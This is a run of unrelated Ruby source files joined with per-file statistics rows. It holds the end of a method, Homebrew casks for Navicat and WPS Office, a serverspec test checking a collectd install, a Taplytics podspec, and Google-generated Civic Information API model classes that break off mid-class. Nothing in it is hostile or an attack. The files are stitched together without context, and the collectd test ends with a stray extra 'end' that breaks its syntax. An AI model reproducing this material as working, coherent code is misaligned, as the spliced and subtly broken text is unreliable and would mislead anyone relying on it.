#   }
#
# The reference implementation applies no platform overrides.
def self.platform_defaults
  {}
end
end
| 23.215311 | 92 | 0.634171 |
6286a276a7932112f4ff685a66f7d628d010bc35 | 309 | class NavicatForPostgresql < Cask
# Application version packaged by this (legacy-style) Homebrew Cask.
version '11.0.18'
# SHA-256 checksum of the disk image named in `url` below.
sha256 'de6e44791b99d33c05da075b33d473a4e512297b17d1549fcda43a831b00ddac'
# Direct download of the vendor-provided dmg.
url 'http://download.navicat.com/download/navicat110_pgsql_en.dmg'
homepage 'http://www.navicat.com/products/navicat-for-postgresql'
# App bundle shipped inside the dmg (old `link` stanza; later cask
# versions call this `app`).
link 'Navicat for PostgreSQL.app'
end
| 30.9 | 75 | 0.805825 |
f7ac39cdbb19678108c0cc88edac4f657e79b0fd | 2,016 | # Copyright 2014, Abiquo
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
require 'serverspec_helper'
describe 'Collectd installation' do
  # Ubuntu splits collectd across several packages; other families ship
  # a single 'collectd' package.
  it 'all collectd packages are installed' do
    case os[:family]
    when 'ubuntu'
      %w(collectd-core libpython2.7).each do |pkg|
        expect(package(pkg)).to be_installed
      end
    else
      expect(package('collectd')).to be_installed
    end
  end

  # Config file and plugin directory locations differ by distro family
  # and, on non-Ubuntu systems, by architecture (lib vs lib64).
  it 'all configuration files are present' do
    if os[:family] == 'ubuntu'
      expect(file('/etc/collectd/collectd.conf')).to exist
      expect(file('/usr/lib/collectd')).to be_directory
    else
      expect(file('/etc/collectd.conf')).to exist
      plugin_dir = os[:arch] == 'x86_64' ? '/usr/lib64/collectd' : '/usr/lib/collectd'
      expect(file(plugin_dir)).to be_directory
    end
  end

  # The recipe's default plugin set must appear as LoadPlugin stanzas.
  it 'the default plugins are installed' do
    config_file = os[:family] == 'ubuntu' ? '/etc/collectd/collectd.conf' : '/etc/collectd.conf'
    %w(cpu memory disk interface).each do |plugin|
      expect(file(config_file)).to contain(%(LoadPlugin "#{plugin}"))
    end
  end

  it 'the collectd service is running' do
    expect(service('collectd')).to be_enabled
    expect(service('collectd')).to be_running
  end
end
end
| 37.333333 | 99 | 0.652778 |
5d3117f919498ccfa5bc45934f940fde27e2b271 | 718 | cask "wpsoffice" do
# Composite "app_version,build" version; split below via before_comma /
# after_comma when interpolating the download URL.
version "2.3.0,3826"
sha256 "2dfb2472f65c3721db0aa7ab36d168c481b128ff4098d2f1ecc2c3126e791329"
# wdl1.pcfg.cache.wpscdn.com/ was verified as official when first introduced to the cask
url "https://wdl1.pcfg.cache.wpscdn.com/wpsdl/macwpsoffice/download/#{version.before_comma}.#{version.after_comma}/WPSOffice_#{version.before_comma}(#{version.after_comma}).dmg"
name "WPS Office"
homepage "https://www.wps.com/mac/"
depends_on macos: ">= :sierra"
# App bundle installed from the dmg.
app "wpsoffice.app"
# Ask the running app (by bundle id) to quit before uninstalling.
uninstall quit: "com.kingsoft.wpsoffice.mac.global"
# User-level leftovers removed by `brew uninstall --zap`.
zap trash: [
"~/Library/Application Scripts/com.kingsoft.wpsoffice.mac.global",
"~/Library/Containers/com.kingsoft.wpsoffice.mac.global",
]
end
| 34.190476 | 179 | 0.750696 |
ac3f406ee4877d982de5984854cd2ccbc1eb1b65 | 923 | Pod::Spec.new do |s|
# Podspec for the closed-source Taplytics iOS SDK, distributed as a
# prebuilt binary framework rather than source files.
s.name = 'Taplytics'
s.version = '1.2.14'
s.author = { 'Taplytics' => '[email protected]' }
s.license = { :type => 'Commercial', :text => 'See http://taplytics.com/terms' }
s.homepage = 'http://taplytics.com'
s.summary = 'iOS framework for using the Taplytics native mobile A/B testing service.'
s.description = 'For installation instructions, please visit: https://github.com/taplytics/taplytics-ios-sdk'
s.source = { :git => 'https://github.com/taplytics/taplytics-ios-sdk.git', :tag => "#{s.version}" }
s.platform = :ios, '6.0'
# System frameworks the SDK links against.
s.frameworks = 'CFNetwork', 'Security', 'CoreTelephony', 'SystemConfiguration'
# Weak-linked so apps that omit AdSupport still run.
s.weak_frameworks = 'AdSupport'
s.requires_arc = true
s.library = 'icucore'
# Ship the prebuilt framework and expose its headers to consumers.
s.preserve_paths = 'Taplytics.framework'
s.public_header_files = "Taplytics.framework/**/*.h"
s.vendored_frameworks = "Taplytics.framework"
end
| 48.578947 | 112 | 0.658722 |
39d54ced76b938947f85ee7a7526b566d8b2474c | 61,054 | # Copyright 2015 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
require 'date'
require 'google/apis/core/base_service'
require 'google/apis/core/json_representation'
require 'google/apis/core/hashable'
require 'google/apis/errors'
module Google
module Apis
module CivicinfoV2
# Describes information about a regional election administrative area.
class AdministrationRegion
  include Google::Apis::Core::Hashable

  # JSON `electionAdministrationBody` — the administrative body (e.g.
  # County Board of Elections). @return [Google::Apis::CivicinfoV2::AdministrativeBody]
  attr_accessor :election_administration_body

  # JSON `id` — an ID for this object; may change between requests and
  # should not be cached. Requires special quota access.
  # @return [String]
  attr_accessor :id

  # JSON `local_jurisdiction` — nested local administrative area.
  # @return [Google::Apis::CivicinfoV2::AdministrationRegion]
  attr_accessor :local_jurisdiction

  # JSON `name` — the name of the jurisdiction. @return [String]
  attr_accessor :name

  # JSON `sources` — sources the data was aggregated from.
  # @return [Array<Google::Apis::CivicinfoV2::Source>]
  attr_accessor :sources

  def initialize(**args)
    update!(**args)
  end

  # Assign any recognized keyword arguments; keys absent from +args+
  # leave the current value untouched.
  def update!(**args)
    %i[election_administration_body id local_jurisdiction name
       sources].each do |key|
      instance_variable_set(:"@#{key}", args[key]) if args.key?(key)
    end
  end
end
# Information about an election administrative body (e.g. County Board of
# Elections).
class AdministrativeBody
  include Google::Apis::Core::Hashable

  # JSON `absenteeVotingInfoUrl` — absentee voting info. @return [String]
  attr_accessor :absentee_voting_info_url

  # JSON `addressLines`. @return [Array<String>]
  attr_accessor :address_lines

  # JSON `ballotInfoUrl` — contest information for the voter. @return [String]
  attr_accessor :ballot_info_url

  # JSON `correspondenceAddress` — a simple address representation.
  # @return [Google::Apis::CivicinfoV2::SimpleAddressType]
  attr_accessor :correspondence_address

  # JSON `electionInfoUrl` — general election information. @return [String]
  attr_accessor :election_info_url

  # JSON `electionOfficials` — officials of this body.
  # @return [Array<Google::Apis::CivicinfoV2::ElectionOfficial>]
  attr_accessor :election_officials

  # JSON `electionRegistrationConfirmationUrl` — confirm voter
  # registration. @return [String]
  attr_accessor :election_registration_confirmation_url

  # JSON `electionRegistrationUrl` — how to register to vote. @return [String]
  attr_accessor :election_registration_url

  # JSON `electionRulesUrl` — election rules. @return [String]
  attr_accessor :election_rules_url

  # JSON `hoursOfOperation`. @return [String]
  attr_accessor :hours_of_operation

  # JSON `name` — name of this administrative body. @return [String]
  attr_accessor :name

  # JSON `physicalAddress` — a simple address representation.
  # @return [Google::Apis::CivicinfoV2::SimpleAddressType]
  attr_accessor :physical_address

  # JSON `voter_services` — services this body may provide.
  # @return [Array<String>]
  attr_accessor :voter_services

  # JSON `votingLocationFinderUrl` — where to vote. @return [String]
  attr_accessor :voting_location_finder_url

  def initialize(**args)
    update!(**args)
  end

  # Assign any recognized keyword arguments; keys absent from +args+
  # leave the current value untouched.
  def update!(**args)
    %i[absentee_voting_info_url address_lines ballot_info_url
       correspondence_address election_info_url election_officials
       election_registration_confirmation_url election_registration_url
       election_rules_url hours_of_operation name physical_address
       voter_services voting_location_finder_url].each do |key|
      instance_variable_set(:"@#{key}", args[key]) if args.key?(key)
    end
  end
end
# Information about a candidate running for elected office.
class Candidate
  include Google::Apis::Core::Hashable

  # JSON `candidateUrl` — campaign web site. @return [String]
  attr_accessor :candidate_url

  # JSON `channels` — known (social) media channels.
  # @return [Array<Google::Apis::CivicinfoV2::Channel>]
  attr_accessor :channels

  # JSON `email` — campaign email address. @return [String]
  attr_accessor :email

  # JSON `name` — candidate's name; joint tickets are rendered as
  # "Top / Bottom" (e.g. "Mitt Romney / Paul Ryan"). @return [String]
  attr_accessor :name

  # JSON `orderOnBallot` — position on the ballot for this contest.
  # @return [String]
  attr_accessor :order_on_ballot

  # JSON `party` — full party name. @return [String]
  attr_accessor :party

  # JSON `phone` — campaign office voice number. @return [String]
  attr_accessor :phone

  # JSON `photoUrl` — URL for a photo of the candidate. @return [String]
  attr_accessor :photo_url

  def initialize(**args)
    update!(**args)
  end

  # Assign any recognized keyword arguments; keys absent from +args+
  # leave the current value untouched.
  def update!(**args)
    %i[candidate_url channels email name order_on_ballot party phone
       photo_url].each do |key|
      instance_variable_set(:"@#{key}", args[key]) if args.key?(key)
    end
  end
end
# A social media or web channel for a candidate.
class Channel
  include Google::Apis::Core::Hashable

  # JSON `id` — unique public identifier of the channel. @return [String]
  attr_accessor :id

  # JSON `type` — channel type; known values include GooglePlus,
  # YouTube, Facebook, Twitter (list is not exhaustive). @return [String]
  attr_accessor :type

  def initialize(**args)
    update!(**args)
  end

  # Assign any recognized keyword arguments; keys absent from +args+
  # leave the current value untouched.
  def update!(**args)
    self.id = args[:id] if args.key?(:id)
    self.type = args[:type] if args.key?(:type)
  end
end
# Information about a contest that appears on a voter's ballot.
class Contest
  include Google::Apis::Core::Hashable

  # JSON `ballotPlacement` — position on the voter's ballot. @return [String]
  attr_accessor :ballot_placement

  # JSON `candidates` — the candidate choices.
  # @return [Array<Google::Apis::CivicinfoV2::Candidate>]
  attr_accessor :candidates

  # JSON `district` — geographic scope of the contest.
  # @return [Google::Apis::CivicinfoV2::ElectoralDistrict]
  attr_accessor :district

  # JSON `electorateSpecifications` — extra eligibility requirements.
  # @return [String]
  attr_accessor :electorate_specifications

  # JSON `id` — unstable object ID; do not cache. Requires special quota
  # access. @return [String]
  attr_accessor :id

  # JSON `level` — government levels of the office; may hold several
  # values for jurisdictions spanning levels (e.g. DC mayor).
  # @return [Array<String>]
  attr_accessor :level

  # JSON `numberElected` — candidates elected to office. @return [String]
  attr_accessor :number_elected

  # JSON `numberVotingFor` — candidates a voter may vote for. @return [String]
  attr_accessor :number_voting_for

  # JSON `office` — name of the office. @return [String]
  attr_accessor :office

  # JSON `primaryParty` — party, for partisan elections. @return [String]
  attr_accessor :primary_party

  # The referendum* properties below are populated only for contests of
  # type 'Referendum'.

  # JSON `referendumBallotResponses` — ballot lines, e.g. "yes"/"no".
  # @return [Array<String>]
  attr_accessor :referendum_ballot_responses

  # JSON `referendumBrief` — short summary shown on the ballot. @return [String]
  attr_accessor :referendum_brief

  # JSON `referendumConStatement` — statement in opposition. @return [String]
  attr_accessor :referendum_con_statement

  # JSON `referendumEffectOfAbstain` — effect of not voting. @return [String]
  attr_accessor :referendum_effect_of_abstain

  # JSON `referendumPassageThreshold` — e.g. "two-thirds". @return [String]
  attr_accessor :referendum_passage_threshold

  # JSON `referendumProStatement` — statement in favor. @return [String]
  attr_accessor :referendum_pro_statement

  # JSON `referendumSubtitle` — brief description. @return [String]
  attr_accessor :referendum_subtitle

  # JSON `referendumText` — full text. @return [String]
  attr_accessor :referendum_text

  # JSON `referendumTitle` — e.g. 'Proposition 42'. @return [String]
  attr_accessor :referendum_title

  # JSON `referendumUrl` — link to the referendum. @return [String]
  attr_accessor :referendum_url

  # JSON `roles` — roles this office fulfills. @return [Array<String>]
  attr_accessor :roles

  # JSON `sources` — sources the data was aggregated from.
  # @return [Array<Google::Apis::CivicinfoV2::Source>]
  attr_accessor :sources

  # JSON `special` — "Yes"/"No": held outside the normal cycle. @return [String]
  attr_accessor :special

  # JSON `type` — 'General', 'Primary', 'Run-off', 'Referendum',
  # 'Retention', etc. @return [String]
  attr_accessor :type

  def initialize(**args)
    update!(**args)
  end

  # Assign any recognized keyword arguments; keys absent from +args+
  # leave the current value untouched.
  def update!(**args)
    %i[ballot_placement candidates district electorate_specifications id
       level number_elected number_voting_for office primary_party
       referendum_ballot_responses referendum_brief
       referendum_con_statement referendum_effect_of_abstain
       referendum_passage_threshold referendum_pro_statement
       referendum_subtitle referendum_text referendum_title
       referendum_url roles sources special type].each do |key|
      instance_variable_set(:"@#{key}", args[key]) if args.key?(key)
    end
  end
end
# Opaque request-context parameters.
class ContextParams
  include Google::Apis::Core::Hashable

  # JSON `clientProfile`. @return [String]
  attr_accessor :client_profile

  def initialize(**args)
    update!(**args)
  end

  # Assign any recognized keyword arguments; absent keys are ignored.
  def update!(**args)
    self.client_profile = args[:client_profile] if args.key?(:client_profile)
  end
end
# A request to look up representative information for a single division.
class DivisionRepresentativeInfoRequest
  include Google::Apis::Core::Hashable

  # JSON `contextParams`. @return [Google::Apis::CivicinfoV2::ContextParams]
  attr_accessor :context_params

  def initialize(**args)
    update!(**args)
  end

  # Assign any recognized keyword arguments; absent keys are ignored.
  def update!(**args)
    self.context_params = args[:context_params] if args.key?(:context_params)
  end
end
# A search request for political geographies.
class DivisionSearchRequest
  include Google::Apis::Core::Hashable

  # JSON `contextParams`. @return [Google::Apis::CivicinfoV2::ContextParams]
  attr_accessor :context_params

  def initialize(**args)
    update!(**args)
  end

  # Assign any recognized keyword arguments; absent keys are ignored.
  def update!(**args)
    self.context_params = args[:context_params] if args.key?(:context_params)
  end
end
# The result of a division search query.
class DivisionSearchResponse
  include Google::Apis::Core::Hashable

  # JSON `kind` — fixed string "civicinfo#divisionSearchResponse".
  # @return [String]
  attr_accessor :kind

  # JSON `results`.
  # @return [Array<Google::Apis::CivicinfoV2::DivisionSearchResult>]
  attr_accessor :results

  def initialize(**args)
    update!(**args)
  end

  # Assign any recognized keyword arguments; absent keys are ignored.
  def update!(**args)
    self.kind = args[:kind] if args.key?(:kind)
    self.results = args[:results] if args.key?(:results)
  end
end
# Represents a political geographic division that matches the requested
# query.
class DivisionSearchResult
  include Google::Apis::Core::Hashable

  # JSON `aliases` — other OCD identifiers for the same division, e.g.
  # divisions defined to be coterminous with this one (Wyoming's single
  # congressional district aliases the state itself).
  # @return [Array<String>]
  attr_accessor :aliases

  # JSON `name` — name of the division. @return [String]
  attr_accessor :name

  # JSON `ocdId` — unique Open Civic Data identifier. @return [String]
  attr_accessor :ocd_id

  def initialize(**args)
    update!(**args)
  end

  # Assign any recognized keyword arguments; absent keys are ignored.
  def update!(**args)
    %i[aliases name ocd_id].each do |key|
      instance_variable_set(:"@#{key}", args[key]) if args.key?(key)
    end
  end
end
# Information about the election that was queried.
class Election
  include Google::Apis::Core::Hashable

  # JSON `electionDay` — day of the election, YYYY-MM-DD. @return [String]
  attr_accessor :election_day

  # JSON `id` — unique ID of this election. @return [String]
  attr_accessor :id

  # JSON `name` — displayable name. @return [String]
  attr_accessor :name

  # JSON `ocdDivisionId` — OCD Division ID of the political division
  # covered, e.g. ocd-division/country:us/state:ca, or the whole US for
  # midterms/general elections. @return [String]
  attr_accessor :ocd_division_id

  def initialize(**args)
    update!(**args)
  end

  # Assign any recognized keyword arguments; absent keys are ignored.
  def update!(**args)
    %i[election_day id name ocd_division_id].each do |key|
      instance_variable_set(:"@#{key}", args[key]) if args.key?(key)
    end
  end
end
# Information about individual election officials.
class ElectionOfficial
  include Google::Apis::Core::Hashable

  # JSON `emailAddress`. @return [String]
  attr_accessor :email_address

  # JSON `faxNumber`. @return [String]
  attr_accessor :fax_number

  # JSON `name` — full name of the official. @return [String]
  attr_accessor :name

  # JSON `officePhoneNumber`. @return [String]
  attr_accessor :office_phone_number

  # JSON `title`. @return [String]
  attr_accessor :title

  def initialize(**args)
    update!(**args)
  end

  # Assign any recognized keyword arguments; absent keys are ignored.
  def update!(**args)
    %i[email_address fax_number name office_phone_number
       title].each do |key|
      instance_variable_set(:"@#{key}", args[key]) if args.key?(key)
    end
  end
end
# Request body for the elections query endpoint.
class ElectionsQueryRequest
  include Google::Apis::Core::Hashable

  # JSON `contextParams`. @return [Google::Apis::CivicinfoV2::ContextParams]
  attr_accessor :context_params

  def initialize(**args)
    update!(**args)
  end

  # Assign any recognized keyword arguments; absent keys are ignored.
  def update!(**args)
    self.context_params = args[:context_params] if args.key?(:context_params)
  end
end
# The list of elections available for this version of the API.
class QueryElectionsResponse
  include Google::Apis::Core::Hashable

  # JSON `elections` — the available elections.
  # @return [Array<Google::Apis::CivicinfoV2::Election>]
  attr_accessor :elections

  # JSON `kind` — fixed string "civicinfo#electionsQueryResponse".
  # @return [String]
  attr_accessor :kind

  def initialize(**args)
    update!(**args)
  end

  # Assign any recognized keyword arguments; absent keys are ignored.
  def update!(**args)
    self.elections = args[:elections] if args.key?(:elections)
    self.kind = args[:kind] if args.key?(:kind)
  end
end
# Describes the geographic scope of a contest.
class ElectoralDistrict
  include Google::Apis::Core::Hashable

  # JSON `id` — identifier relative to its scope; e.g. the 34th State
  # Senate district has id "34" with scope stateUpper. @return [String]
  attr_accessor :id

  # JSON `kgForeignKey`. @return [String]
  attr_accessor :kg_foreign_key

  # JSON `name` — name of the district. @return [String]
  attr_accessor :name

  # JSON `scope` — one of: national, statewide, congressional,
  # stateUpper, stateLower, countywide, judicial, schoolBoard, cityWide,
  # township, countyCouncil, cityCouncil, ward, special; unspecified
  # when the geography is unknown. @return [String]
  attr_accessor :scope

  def initialize(**args)
    update!(**args)
  end

  # Assign any recognized keyword arguments; absent keys are ignored.
  def update!(**args)
    %i[id kg_foreign_key name scope].each do |key|
      instance_variable_set(:"@#{key}", args[key]) if args.key?(key)
    end
  end
end
# Describes a political geography.
class GeographicDivision
  include Google::Apis::Core::Hashable

  # JSON `alsoKnownAs` — other valid OCD IDs equivalent to the primary
  # one (returned in ocd_id); e.g. ocd-division/country:us/district:dc
  # is also known as ocd-division/country:us/state:dc.
  # @return [Array<String>]
  attr_accessor :also_known_as

  # JSON `name` — name of the division. @return [String]
  attr_accessor :name

  # JSON `officeIndices` — indices into the offices array, one per
  # office elected from this division; present only when includeOffices
  # was true (or absent) in the request. @return [Array<Fixnum>]
  attr_accessor :office_indices

  def initialize(**args)
    update!(**args)
  end

  # Assign any recognized keyword arguments; absent keys are ignored.
  def update!(**args)
    %i[also_known_as name office_indices].each do |key|
      instance_variable_set(:"@#{key}", args[key]) if args.key?(key)
    end
  end
end
# Information about an Office held by one or more Officials.
class Office
  include Google::Apis::Core::Hashable

  # JSON `divisionId` — OCD ID of the associated division. @return [String]
  attr_accessor :division_id

  # JSON `levels` — government levels this office is part of; may hold
  # several values for jurisdictions spanning levels (e.g. DC mayor).
  # @return [Array<String>]
  attr_accessor :levels

  # JSON `name` — human-readable office name. @return [String]
  attr_accessor :name

  # JSON `officialIndices` — indices into the officials array of the
  # current office holders. @return [Array<Fixnum>]
  attr_accessor :official_indices

  # JSON `roles` — rough role categories for selection/sorting; not
  # exhaustive. @return [Array<String>]
  attr_accessor :roles

  # JSON `sources` — sources the data was aggregated from.
  # @return [Array<Google::Apis::CivicinfoV2::Source>]
  attr_accessor :sources

  def initialize(**args)
    update!(**args)
  end

  # Assign any recognized keyword arguments; absent keys are ignored.
  def update!(**args)
    %i[division_id levels name official_indices roles
       sources].each do |key|
      instance_variable_set(:"@#{key}", args[key]) if args.key?(key)
    end
  end
end
# Information about a person holding an elected office.
class Official
  include Google::Apis::Core::Hashable

  # JSON `address` — contact addresses.
  # @return [Array<Google::Apis::CivicinfoV2::SimpleAddressType>]
  attr_accessor :address

  # JSON `channels` — known (social) media channels.
  # @return [Array<Google::Apis::CivicinfoV2::Channel>]
  attr_accessor :channels

  # JSON `emails` — direct email addresses. @return [Array<String>]
  attr_accessor :emails

  # JSON `name` — the official's name. @return [String]
  attr_accessor :name

  # JSON `party` — full party name. @return [String]
  attr_accessor :party

  # JSON `phones` — public contact phone numbers. @return [Array<String>]
  attr_accessor :phones

  # JSON `photoUrl` — URL for a photo. @return [String]
  attr_accessor :photo_url

  # JSON `urls` — public website URLs. @return [Array<String>]
  attr_accessor :urls

  def initialize(**args)
    update!(**args)
  end

  # Assign any recognized keyword arguments; absent keys are ignored.
  def update!(**args)
    %i[address channels emails name party phones photo_url
       urls].each do |key|
      instance_variable_set(:"@#{key}", args[key]) if args.key?(key)
    end
  end
end
# A location where a voter can vote. This may be an early vote site, an election
# day voting location, or a drop off location for a completed ballot.
class PollingLocation
include Google::Apis::Core::Hashable
# A simple representation of an address.
# Corresponds to the JSON property `address`
# @return [Google::Apis::CivicinfoV2::SimpleAddressType]
attr_accessor :address
# The last date that this early vote site or drop off location may be used. This
# field is not populated for polling locations.
# Corresponds to the JSON property `endDate`
# @return [String]
attr_accessor :end_date
# An ID for this object. IDs may change in future requests and should not be
# cached. Access to this field requires special access that can be requested
# from the Request more link on the Quotas page.
# Corresponds to the JSON property `id`
# @return [String]
attr_accessor :id
# The name of the early vote site or drop off location. This field is not
# populated for polling locations.
# Corresponds to the JSON property `name`
# @return [String]
attr_accessor :name
# Notes about this location (e.g. accessibility ramp or entrance to use).
# Corresponds to the JSON property `notes`
# @return [String]
attr_accessor :notes
# A description of when this location is open.
# Corresponds to the JSON property `pollingHours`
# @return [String]
attr_accessor :polling_hours
# A list of sources for this location. If multiple sources are listed the data
# has been aggregated from those sources.
# Corresponds to the JSON property `sources`
# @return [Array<Google::Apis::CivicinfoV2::Source>]
attr_accessor :sources
# The first date that this early vote site or drop off location may be used.
# This field is not populated for polling locations.
# Corresponds to the JSON property `startDate`
# @return [String]
attr_accessor :start_date
# The services provided by this early vote site or drop off location. This field
# is not populated for polling locations.
# Corresponds to the JSON property `voterServices`
# @return [String]
attr_accessor :voter_services
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@address = args[:address] if args.key?(:address)
@end_date = args[:end_date] if args.key?(:end_date)
@id = args[:id] if args.key?(:id)
@name = args[:name] if args.key?(:name)
@notes = args[:notes] if args.key?(:notes)
@polling_hours = args[:polling_hours] if args.key?(:polling_hours)
@sources = args[:sources] if args.key?(:sources)
@start_date = args[:start_date] if args.key?(:start_date)
@voter_services = args[:voter_services] if args.key?(:voter_services)
end
end
#
class PostalAddress
include Google::Apis::Core::Hashable
#
# Corresponds to the JSON property `addressLines`
# @return [Array<String>]
attr_accessor :address_lines
#
# Corresponds to the JSON property `administrativeAreaName`
# @return [String]
attr_accessor :administrative_area_name
#
# Corresponds to the JSON property `countryName`
# @return [String]
attr_accessor :country_name
#
# Corresponds to the JSON property `countryNameCode`
# @return [String]
attr_accessor :country_name_code
#
# Corresponds to the JSON property `dependentLocalityName`
# @return [String]
attr_accessor :dependent_locality_name
#
# Corresponds to the JSON property `dependentThoroughfareLeadingType`
# @return [String]
attr_accessor :dependent_thoroughfare_leading_type
#
# Corresponds to the JSON property `dependentThoroughfareName`
# @return [String]
attr_accessor :dependent_thoroughfare_name
#
# Corresponds to the JSON property `dependentThoroughfarePostDirection`
# @return [String]
attr_accessor :dependent_thoroughfare_post_direction
#
# Corresponds to the JSON property `dependentThoroughfarePreDirection`
# @return [String]
attr_accessor :dependent_thoroughfare_pre_direction
#
# Corresponds to the JSON property `dependentThoroughfareTrailingType`
# @return [String]
attr_accessor :dependent_thoroughfare_trailing_type
#
# Corresponds to the JSON property `dependentThoroughfaresConnector`
# @return [String]
attr_accessor :dependent_thoroughfares_connector
#
# Corresponds to the JSON property `dependentThoroughfaresIndicator`
# @return [String]
attr_accessor :dependent_thoroughfares_indicator
#
# Corresponds to the JSON property `dependentThoroughfaresType`
# @return [String]
attr_accessor :dependent_thoroughfares_type
#
# Corresponds to the JSON property `firmName`
# @return [String]
attr_accessor :firm_name
#
# Corresponds to the JSON property `isDisputed`
# @return [Boolean]
attr_accessor :is_disputed
alias_method :is_disputed?, :is_disputed
#
# Corresponds to the JSON property `languageCode`
# @return [String]
attr_accessor :language_code
#
# Corresponds to the JSON property `localityName`
# @return [String]
attr_accessor :locality_name
#
# Corresponds to the JSON property `postBoxNumber`
# @return [String]
attr_accessor :post_box_number
#
# Corresponds to the JSON property `postalCodeNumber`
# @return [String]
attr_accessor :postal_code_number
#
# Corresponds to the JSON property `postalCodeNumberExtension`
# @return [String]
attr_accessor :postal_code_number_extension
#
# Corresponds to the JSON property `premiseName`
# @return [String]
attr_accessor :premise_name
#
# Corresponds to the JSON property `recipientName`
# @return [String]
attr_accessor :recipient_name
#
# Corresponds to the JSON property `sortingCode`
# @return [String]
attr_accessor :sorting_code
#
# Corresponds to the JSON property `subAdministrativeAreaName`
# @return [String]
attr_accessor :sub_administrative_area_name
#
# Corresponds to the JSON property `subPremiseName`
# @return [String]
attr_accessor :sub_premise_name
#
# Corresponds to the JSON property `thoroughfareLeadingType`
# @return [String]
attr_accessor :thoroughfare_leading_type
#
# Corresponds to the JSON property `thoroughfareName`
# @return [String]
attr_accessor :thoroughfare_name
#
# Corresponds to the JSON property `thoroughfareNumber`
# @return [String]
attr_accessor :thoroughfare_number
#
# Corresponds to the JSON property `thoroughfarePostDirection`
# @return [String]
attr_accessor :thoroughfare_post_direction
#
# Corresponds to the JSON property `thoroughfarePreDirection`
# @return [String]
attr_accessor :thoroughfare_pre_direction
#
# Corresponds to the JSON property `thoroughfareTrailingType`
# @return [String]
attr_accessor :thoroughfare_trailing_type
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@address_lines = args[:address_lines] if args.key?(:address_lines)
@administrative_area_name = args[:administrative_area_name] if args.key?(:administrative_area_name)
@country_name = args[:country_name] if args.key?(:country_name)
@country_name_code = args[:country_name_code] if args.key?(:country_name_code)
@dependent_locality_name = args[:dependent_locality_name] if args.key?(:dependent_locality_name)
@dependent_thoroughfare_leading_type = args[:dependent_thoroughfare_leading_type] if args.key?(:dependent_thoroughfare_leading_type)
@dependent_thoroughfare_name = args[:dependent_thoroughfare_name] if args.key?(:dependent_thoroughfare_name)
@dependent_thoroughfare_post_direction = args[:dependent_thoroughfare_post_direction] if args.key?(:dependent_thoroughfare_post_direction)
@dependent_thoroughfare_pre_direction = args[:dependent_thoroughfare_pre_direction] if args.key?(:dependent_thoroughfare_pre_direction)
@dependent_thoroughfare_trailing_type = args[:dependent_thoroughfare_trailing_type] if args.key?(:dependent_thoroughfare_trailing_type)
@dependent_thoroughfares_connector = args[:dependent_thoroughfares_connector] if args.key?(:dependent_thoroughfares_connector)
@dependent_thoroughfares_indicator = args[:dependent_thoroughfares_indicator] if args.key?(:dependent_thoroughfares_indicator)
@dependent_thoroughfares_type = args[:dependent_thoroughfares_type] if args.key?(:dependent_thoroughfares_type)
@firm_name = args[:firm_name] if args.key?(:firm_name)
@is_disputed = args[:is_disputed] if args.key?(:is_disputed)
@language_code = args[:language_code] if args.key?(:language_code)
@locality_name = args[:locality_name] if args.key?(:locality_name)
@post_box_number = args[:post_box_number] if args.key?(:post_box_number)
@postal_code_number = args[:postal_code_number] if args.key?(:postal_code_number)
@postal_code_number_extension = args[:postal_code_number_extension] if args.key?(:postal_code_number_extension)
@premise_name = args[:premise_name] if args.key?(:premise_name)
@recipient_name = args[:recipient_name] if args.key?(:recipient_name)
@sorting_code = args[:sorting_code] if args.key?(:sorting_code)
@sub_administrative_area_name = args[:sub_administrative_area_name] if args.key?(:sub_administrative_area_name)
@sub_premise_name = args[:sub_premise_name] if args.key?(:sub_premise_name)
@thoroughfare_leading_type = args[:thoroughfare_leading_type] if args.key?(:thoroughfare_leading_type)
@thoroughfare_name = args[:thoroughfare_name] if args.key?(:thoroughfare_name)
@thoroughfare_number = args[:thoroughfare_number] if args.key?(:thoroughfare_number)
@thoroughfare_post_direction = args[:thoroughfare_post_direction] if args.key?(:thoroughfare_post_direction)
@thoroughfare_pre_direction = args[:thoroughfare_pre_direction] if args.key?(:thoroughfare_pre_direction)
@thoroughfare_trailing_type = args[:thoroughfare_trailing_type] if args.key?(:thoroughfare_trailing_type)
end
end
#
class RepresentativeInfoData
include Google::Apis::Core::Hashable
# Political geographic divisions that contain the requested address.
# Corresponds to the JSON property `divisions`
# @return [Hash<String,Google::Apis::CivicinfoV2::GeographicDivision>]
attr_accessor :divisions
# Elected offices referenced by the divisions listed above. Will only be present
# if includeOffices was true in the request.
# Corresponds to the JSON property `offices`
# @return [Array<Google::Apis::CivicinfoV2::Office>]
attr_accessor :offices
# Officials holding the offices listed above. Will only be present if
# includeOffices was true in the request.
# Corresponds to the JSON property `officials`
# @return [Array<Google::Apis::CivicinfoV2::Official>]
attr_accessor :officials
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@divisions = args[:divisions] if args.key?(:divisions)
@offices = args[:offices] if args.key?(:offices)
@officials = args[:officials] if args.key?(:officials)
end
end
# A request for political geography and representative information for an
# address.
class RepresentativeInfoRequest
include Google::Apis::Core::Hashable
#
# Corresponds to the JSON property `contextParams`
# @return [Google::Apis::CivicinfoV2::ContextParams]
attr_accessor :context_params
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@context_params = args[:context_params] if args.key?(:context_params)
end
end
# The result of a representative info lookup query.
class RepresentativeInfoResponse
include Google::Apis::Core::Hashable
# Political geographic divisions that contain the requested address.
# Corresponds to the JSON property `divisions`
# @return [Hash<String,Google::Apis::CivicinfoV2::GeographicDivision>]
attr_accessor :divisions
# Identifies what kind of resource this is. Value: the fixed string "civicinfo#
# representativeInfoResponse".
# Corresponds to the JSON property `kind`
# @return [String]
attr_accessor :kind
# A simple representation of an address.
# Corresponds to the JSON property `normalizedInput`
